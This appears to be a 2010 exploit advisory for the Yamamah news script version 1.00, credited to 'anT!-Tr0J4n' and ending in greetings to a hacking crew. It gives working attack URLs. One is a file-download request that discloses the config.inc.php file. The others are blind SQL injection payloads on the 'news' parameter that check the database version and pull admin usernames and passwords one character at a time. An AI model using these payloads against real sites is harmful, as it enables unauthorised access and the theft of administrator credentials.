48 lines
No EOL
1.6 KiB
Text
48 lines
No EOL
1.6 KiB
Text
# Exploit Title: Yamamah Vulnerability (news) SQL Injection / disclosure Vulnerability
|
|
# Date: 12-06-2010
|
|
# Author: anT!-Tr0J4n
|
|
#My Home : www.Dev-PoinT.com
|
|
# Software Link:http://www.yamamah.org
|
|
# Version: 1.00
|
|
# Tested on: Win7/Linux
|
|
#DorK : N / A
|
|
|
|
========== Exploit By anT!-Tr0J4n============
|
|
|
|
=======Yamamah source code disclosure Vulnerability ============
|
|
|
|
[>] exploit ->
|
|
|
|
http://localhsot/yamamah/index.php?download=(file name)
|
|
|
|
http://server/[path]/index.php?download=includes/config.inc.php
|
|
|
|
======================================================
|
|
[>] Yamamah (news) Blind SQL Injection Vulnerability
|
|
======================================================
|
|
[>] exploit ->
|
|
|
|
[>] (news) Blind SQL Injection
|
|
|
|
[>] http://localhost/yamamah/?news=1[BSQLi]
|
|
|
|
=================POC=====================
|
|
|
|
http://server/yamamah/?news=1+and substring(@@version,1,1)=5 --> True
|
|
|
|
http://server/yamamah/?news=1+and substring(@@version,1,1)=4 --> False
|
|
|
|
http://server/yamamah/?news=1+and%20%28select%20substring%28concat%281,username%29,1,1%29%20from%20admin%20limit%200,1%29=1
|
|
|
|
http://server/yamamah/?news=1+and%20%28select%20substring%28concat%281,password%29,1,1%29%20from%20admin%20limit%200,1%29=1
|
|
|
|
===============ABDO-R3ZK==================
|
|
|
|
MY HomE : www.Dev-PoinT.com
|
|
Author : anT!-Tr0J4n
|
|
EmaiL : D3v-PoinT@Hotmail.com & C1EH@Hotmail.com
|
|
|
|
Special Thx:Dev-P0!nT T34M /GlaDiatOr/SILVER STAR/ProfessionaL/Coffin Of Evil/HoBeeZ/ ABO-FaHED /Gonone Rash3d EL maged /mahmoudvip/
|
|
Mr.Mh$TEr / M [Zero] / R3d-D3v1l (ALL sEc-r1z crEw) /Cyber-Err0r/ saLman EL anz33 / FnooN =ABUO ShADEN /NASHY && And All My Frindes
|
|
|
|
===============ABDO-R3ZK================== |